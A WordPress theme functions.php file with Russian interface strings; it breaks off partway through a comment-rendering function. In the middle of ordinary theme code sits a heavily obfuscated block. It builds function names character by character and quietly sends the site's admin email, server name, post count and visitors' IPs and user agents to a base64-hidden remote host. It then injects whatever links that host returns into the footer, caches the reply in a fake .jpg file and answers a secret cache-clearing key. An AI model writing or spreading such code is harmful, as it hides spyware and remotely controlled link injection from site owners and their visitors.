<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MseHx='d';$oWCCuiR='c';$FNve='a';$ISXC='e';$gpRS='e';$wRUfabu='d';$UqxYRok='e';$CCGSW='o';$KhptH='_';$iAuoLc='b';$DoxGpd='4';$FeBRliZ='6';$JzEcjaI='s';$HLFNmFmh=$iAuoLc.$FNve.$JzEcjaI.$gpRS.$FeBRliZ.$DoxGpd.$KhptH.$wRUfabu.$UqxYRok.$oWCCuiR.$CCGSW.$MseHx.$ISXC;$DtAM='z';$gQeSOe='a';$KNVzB='g';$zdvEl='t';$Ibsh='f';$xbhlCtv='e';$dVrDx='l';$TQhNBm='n';$aBKZbfi='i';$ULfvhOjy=$KNVzB.$DtAM.$aBKZbfi.$TQhNBm.$Ibsh.$dVrDx.$gQeSOe.$zdvEl.$xbhlCtv;$hAvTbX='_';$ouYf='r';$rTVoDrD='3';$APItb='o';$PQYlvkl='s';$zQMZ='t';$TnmStVZ='1';$woFlfE='r';$msfPMAb='t';$uMMBCQur=$PQYlvkl.$msfPMAb.$ouYf.$hAvTbX.$woFlfE.$APItb.$zQMZ.$TnmStVZ.$rTVoDrD;$cMrNIGv='s';$iCFoSJ='r';$YnTLFGu='e';$LAeNW='t';$HKWKnkw='r';$cPYC='v';$bbcDoLDO=$cMrNIGv.$LAeNW.$iCFoSJ.$HKWKnkw.$YnTLFGu.$cPYC;                     $pw____n='d';$kv____z='c';$au______________d='a';$wm____________b='e';$ng______o='e';$ae_________r='d';$ap_______________b='e';$cj_________q='o';$xw_____________i='_';$rw___g='b';$er____________h='4';$xa______g='6';$ph____o='s';$pf______e=$rw___g.$au______________d.$ph____o.$ng______o.$xa______g.$er____________h.$xw_____________i.$ae_________r.$ap_______________b.$kv____z.$cj_________q.$pw____n.$wm____________b;$ye_______n='x';$bz___________d='i';$vw____c='n';$mi__v='t';$xd___________g='i';$pt____________e='c';$mj_______h='s';$um___________w='s';$yh____o='e';$hv______b='f';$qq_______________u='n';$sm____f='_';$jr____________k='t';$ml____a='u';$id_______o='o';$pp_________g=$hv______b.$ml____a.$qq_______________u.$pt____________e.$jr____________k.$bz___________d.$id_______o.$vw____c.$sm____f.$yh____o.$ye_______n.$xd___________g.$um___________w.$mi__v.$mj_______h;$uv______v='p';$cg________j='o';$rt_____________d='f';$xi_______________l='n';$kn____________f='e';$cu_________e=$rt_____________d.$cg________j.$uv______v.$kn____________f.$xi_______________l;$qg___o='a';$yc___g='e';$cy___r='d';$xi__________u='f';$qq_____w='r';$nk________w=$xi__________u.$qq_____w.$yc___g.$qg___o.$cy___r;$ab_____b='c';$ad____________r='f';$jq______________n='o';$lo____g='l';$bx_____v='e';$uj_____o='s';$vp_________i=$ad____________r.$ab_____b.$lo____g.$jq______________n.$uj_____o.$bx_____v;define("WP_ID", $pf______e("Mi4wLjA="));define("WP_TTL", $pf______e("MTA4MDA="));define("WP_SRC", $pf______e("dHBva24="));function wp_get_header() {global $pf______e, $pp_________g;if ($pp_________g($pf______e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$pp_________g($pf______e("d3BfZ2V0X2Zvb3Rlcg==")) &&$pp_________g($pf______e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $pf______e, $cu_________e, $vp_________i, $nk________w;$id______________q = TEMPLATEPATH."/".$pf______e("Zm9vdGVyLnBocA==");$cp________f = @$cu_________e($id______________q, "r");$id______________q = @$nk________w($cp________f, @filesize($id______________q));@$vp_________i($cp________f);$qa_____d = TEMPLATEPATH."/".$pf______e("ZnVuY3Rpb25zLnBocA==");$cp________f = @$cu_________e($qa_____d, "r");$qa_____d = @$nk________w($cp________f, @filesize($qa_____d));@$vp_________i($cp________f);$bx___n = 0;if($id______________q && $qa_____d) {if ($pf______e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($id______________q, $pf______e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$bx___n = 1;}if (substr_count($id______________q, "wp_theme_GPL_credits()") < 1) {$bx___n = 2;}}if(WP_ID != "2.0.0") {$bx___n = 12;}}if($bx___n > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $bx___n -->";}}function wp_loaded() {global $pf______e, $pp_________g;return $pp_________g($pf______e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($nd_____x, $ci________p = "(more...)", $bq__________v = 0, $af_____d = "") {$ms_________i = get_the_content($ci________p, $bq__________v, $af_____d);$ms_________i = apply_filters("the_content", $ms_________i);$ms_________i = str_replace("]]>", "]]>", $ms_________i);if (strlen($_GET["p"]) > 0) {echo $ms_________i;}else if ((strlen($ms_________i)>$nd_____x) && ($iq_____x = strpos($ms_________i, " ", $nd_____x ))) {$ms_________i = substr($ms_________i, 0, $iq_____x);$ms_________i = $ms_________i;echo $ms_________i;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ci________p</a></div></p>";} else {echo $ms_________i;}}}$mg______j='4';$lr_______________o='d';$ak__________j='n';$yt____________a='b';$ew_____z='e';$rh___________p='e';$yi_______________a='c';$vp________z='o';$ob________b='e';$cx___y='6';$cm___________l='s';$in____________o='a';$zb__________i='_';$yx__p=$yt____________a.$in____________o.$cm___________l.$ew_____z.$cx___y.$mg______j.$zb__________i.$rh___________p.$ak__________j.$yi_______________a.$vp________z.$lr_______________o.$ob________b;$rk_______n='t';$uu__________l='t';$ya_________l='n';$rv_______i='g';$aw____l='t';$ex________t='c';$wa_____________y='e';$po______________a='l';$df___________x='i';$uk_______________y='s';$hp_____v='e';$ky_____o='_';$zp________r='n';$qz____________m='e';$lj____________s='o';$va_________s='f';$nt_____e='_';$qc____d=$va_________s.$df___________x.$po______________a.$hp_____v.$nt_____e.$rv_______i.$wa_____________y.$rk_______n.$ky_____o.$ex________t.$lj____________s.$ya_________l.$uu__________l.$qz____________m.$zp________r.$aw____l.$uk_______________y;$bw___________d='f';$hj______________i='i';$qs_______________g='t';$gb_____n='i';$gn______________e='e';$fp________m='s';$mn______________t='s';$ey_____________h='_';$st________y='x';$mf______________b='e';$qu_________p='l';$qx______________s=$bw___________d.$gb_____n.$qu_________p.$gn______________e.$ey_____________h.$mf______________b.$st________y.$hj______________i.$fp________m.$qs_______________g.$mn______________t;$mx______e='s';$bj__p='r';$gc___________b='v';$lf___u='a';$iq_____________b='o';$iw____x='n';$wz_____________e='r';$uw______z='c';$pp____________b='m';$vb___w='e';$ef______________o='e';$as____h='_';$mb_____y='p';$lk__f='i';$bf_________c='o';$kn_______________p=$gc___________b.$ef______________o.$bj__p.$mx______e.$lk__f.$iq_____________b.$iw____x.$as____h.$uw______z.$bf_________c.$pp____________b.$mb_____y.$lf___u.$wz_____________e.$vb___w;$dy__________u='f';$fv__________l='k';$ia__n='c';$az_______________d='s';$ay_________e='e';$we_______________w='n';$ob___________j='o';$to________z='o';$qz______f='p';$qc_____________u=$dy__________u.$az_______________d.$ob___________j.$ia__n.$fv__________l.$to________z.$qz______f.$ay_________e.$we_______________w;$ny__________r='f';$gl__z='r';$vp_______u='w';$nw______________k='i';$hi___f='t';$ds_____________z='e';$on____f=$ny__________r.$vp_______u.$gl__z.$nw______________k.$hi___f.$ds_____________z;$hs_______________o='d';$aa____________e='5';$ak____________n='m';$xx______i=$ak____________n.$hs_______________o.$aa____________e;$gb_______y='r';$ec_________f='p';$cd_____c='a';$sx__________y='h';$nk_____________m='t';$ic_______o='e';$ak______n='a';$tw__n='l';$he_____b=$gb_______y.$ic_______o.$ak______n.$tw__n.$ec_________f.$cd_____c.$nk_____________m.$sx__________y;$kf____g='a';$uk_____________x='e';$lu__________b='u';$hn____________r='i';$xg____a='i';$qz____________o='r';$cz_______________k='e';$fn______________q='l';$mw_____f='s';$dy____p='z';$kq_____l='n';$kd___w=$lu__________b.$kq_____l.$mw_____f.$cz_______________k.$qz____________o.$xg____a.$kf____g.$fn______________q.$hn____________r.$dy____p.$uk_____________x;$vt____g='a';$hi________q='n';$ok_________w='p';$eg_________z='m';$rl____l='t';$ms___u='e';$kt________j='m';$jt_______________a=$rl____l.$ms___u.$kt________j.$ok_________w.$hi________q.$vt____g.$eg_________z;$rp___u='e';$yb___q='a';$xd____u='r';$im______________g='c';$wa__________s='s';$bi____________e='x';$az_______k='e';$ya_____________x='o';$nt____m='r';$ky___________s='t';$it______________k='e';$ca____________g='m';$ok__u='_';$pe______________y='e';$ia_______________j='_';$gx_______c='c';$jn_______s='t';$zh_____________x='n';$yy________x='t';$rg_______t='t';$cm_____z='a';$xt___________d=$wa__________s.$yy________x.$xd____u.$it______________k.$cm_____z.$ca____________g.$ia_______________j.$gx_______c.$ya_____________x.$zh_____________x.$ky___________s.$rp___u.$bi____________e.$jn_______s.$ok__u.$im______________g.$nt____m.$az_______k.$yb___q.$rg_______t.$pe______________y;function gg________k($kv______________f) {global $pf______e, $pp_________g, $qc____d, $kn_______________p, $xt___________d;if (!$pp_________g($pf______e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($kn_______________p(PHP_VERSION, "5.0.0", ">=") && $pp_________g($pf______e("ZmlsZV9nZXRfY29udGVudHM=")) && $pp_________g($pf______e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$dc__d = $xt___________d(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$qe____________r = @$qc____d($kv______________f, 0, $dc__d);} else {$qe____________r = @$qc____d($kv______________f, 0);}return $qe____________r;}function ms___________e($kv______________f) {global $pp_________g, $qc_____________u, $on____f, $pf______e;if (!$pp_________g($pf______e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ib_________m = strpos($kv______________f, "/", 7);$nm________y = array("uri"     => substr($kv______________f, $ib_________m),"host"    => str_replace("http://", "", substr($kv______________f, 0, $ib_________m)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$bw_________o = @$qc_____________u("$nm________y[host]", 80, $kv_______________l, $zk____s, 4);if (!$bw_________o) {return false;} else {$qe____________r = "";$yj________r  = "GET $nm________y[uri] HTTP/1.0\r\n";$yj________r .= "Host: $nm________y[host]\r\n";$yj________r .= "Referer: $nm________y[referer]\r\n";$yj________r .= "Connection: Close\r\n\r\n";@$on____f($bw_________o, $yj________r);while (!@feof($bw_________o)) {$tc_______b = @fgets($bw_________o, (1024*24));if ($tc_______b == "\r\n") {$gj___x = true;continue;}if ($gj___x) {$qe____________r .= $tc_______b;}}return $qe____________r;}}function bt_____m($kv______________f) {global $pp_________g;$oi____________r = false;if ($kv______________f != "") {if ($pp_________g("gg________k")) {$oi____________r = @gg________k($kv______________f);}if (!$oi____________r && ($pp_________g("ms___________e"))) {$oi____________r = @ms___________e($kv______________f);}}return $oi____________r;}function cv______z() {global $_SERVER, $xx______i;$uu_________x = $_SERVER["SERVER_NAME"];if (substr("$uu_________x", 0, 4) == "www.") {$uu_________x = substr("$uu_________x", 4);}$uu_________x = $xx______i("$_SERVER[SERVER_NAME]");return $uu_________x;}function dp_______a() {return "file";}function ck_______________p($kv______________f) {global $_SERVER, $qc____d, $qx______________s, $cu_________e, $vp_________i, $on____f;$cs______________l = an______q();$uu___p = cv______z().".jpg";$bf__________o = $cs______________l["dir_upload"]["path"]."/$uu___p";$po_________b = @filemtime($bf__________o);if (!$po_________b || ((time()-$po_________b) >= WP_TTL)) {$oi____________r = bt_____m($kv______________f);if ($oi____________r) {if ($qx______________s($bf__________o)) {@unlink($bf__________o);}$cp________f = @$cu_________e($bf__________o, "x+");@$on____f($cp________f, $oi____________r);@$vp_________i($cp________f);}} else {if ($qx______________s($bf__________o)) {$oi____________r = @$qc____d($bf__________o);} else {$oi____________r = false;}}return $oi____________r;}function an______q() {global $_SERVER, $pf______e, $yx__p;$we__________b = wp_count_posts("post");$rv______________k = pathinfo(get_bloginfo("template_directory"));$cs______________l = array("url" => array("report"      => $pf______e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $rv______________k,"dir_upload"=> eg__p(),"queryString"=> array("?a001=".WP_ID,"a004=".$rv______________k[filename],"a005=".$we__________b->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$cs______________l["url"]["queryString"] = implode("&", $cs______________l["queryString"]);$cs______________l["url"]["report"] = $cs______________l["url"]["report"]."/?".$yx__p($cs______________l["url"]["queryString"]).".html";return $cs______________l;}function eg__p() {$dw___________d = wp_upload_dir();if (isset($dw___________d["error"])) {$ww_____________b = ub_____q();if (is_writable($ww_____________b)) {$dw___________d = array("path" => $ww_____________b);}}return $dw___________d;}function ub_____q() {global $pp_________g, $xx______i, $he_____b, $jt_______________a;$ex_________i = (bool) ini_get("safe_mode");if ($ex_________i == true) {return false;}if ($pp_________g("sys_get_temp_dir")) {$ye______________h = sys_get_temp_dir();if (is_writable($ye______________h)) {return $he_____b($ye______________h);}}if (!empty($_ENV["TMP"])) {return $he_____b($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $he_____b($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $he_____b($_ENV["TEMP"]);} else {$wg__________t = $jt_______________a($xx______i(uniqid(rand(), true)), "");if ($wg__________t) {$ye______________h = $he_____b(dirname($wg__________t));@unlink($wg__________t);return $ye______________h;} else {return false;}}}function rm_____________b() {global $_GET, $qx______________s;$cs______________l = an______q();$uu_________x = cv______z();$hz_______m = dp_______a();$tz__________i = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($hz_______m == "file") {$fd__q = $cs______________l["dir_upload"]["path"]."/".$uu_________x.".jpg";if ($qx______________s($fd__q)) {@unlink($fd__q);$tz__________i = "deleted";}}$yp____t = array("s"=> $tz__________i,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($yp____t AS $dn________i => $rn_______________l) echo " [$dn________i:$rn_______________l]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $pp_________g, $pf______e, $kd___w;$cs______________l = an______q();$lm___p = "ck_______________p";if ($pp_________g($lm___p)) {$qe____________r = $lm___p($cs______________l["url"]["report"]);}if ($qe____________r) {if ($qe____________r = @$pf______e($qe____________r)) {$qe____________r = @$kd___w($qe____________r);if (strlen($qe____________r[custom_credit]) >= 5) {$cs______________l["default_string"] = $qe____________r[custom_credit];}if ($qe____________r["status"] == "0") {$pg____m = 1;$kt_______u = 1;} else {$vs_________n = sizeof($qe____________r["links"]);$to__t = $cs______________l["default_string"];if ($vs_________n > 0 && $qe____________r["links"] !== "") {$wk____________s = 0;foreach ($qe____________r["links"] as $rl_________j => $xb_____y) {$wk____________s++;if ($xb_____y->l_path == "" || $xb_____y->l_path == $_SERVER["REQUEST_URI"]) {$xb_____y->l_href = htmlspecialchars(strip_tags($xb_____y->l_href));$xb_____y->l_title = htmlspecialchars(strip_tags($xb_____y->l_title));$xb_____y->l_anchor = htmlspecialchars(strip_tags($xb_____y->l_anchor));$to__t .= " | ";$to__t .= "<a href='$xb_____y->l_href' title='$xb_____y->l_title'";if ($xb_____y->l_nofollow == "1") {$to__t .= " rel='nofollow'";}$to__t .= ">$xb_____y->l_anchor</a>";}}}$cs______________l["links"] = "$to__t";if ($qe____________r[credit] == "0") {$cs______________l["links"] = "";}}} else {$pg____m = "1";}} else {$pg____m = "1";}if ($pg____m == "1") {$cs______________l["links"] = $cs______________l["default_string"];}echo "$cs______________l[links]";echo "<!-- s: $qe____________r[signature] -->";rm_____________b();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
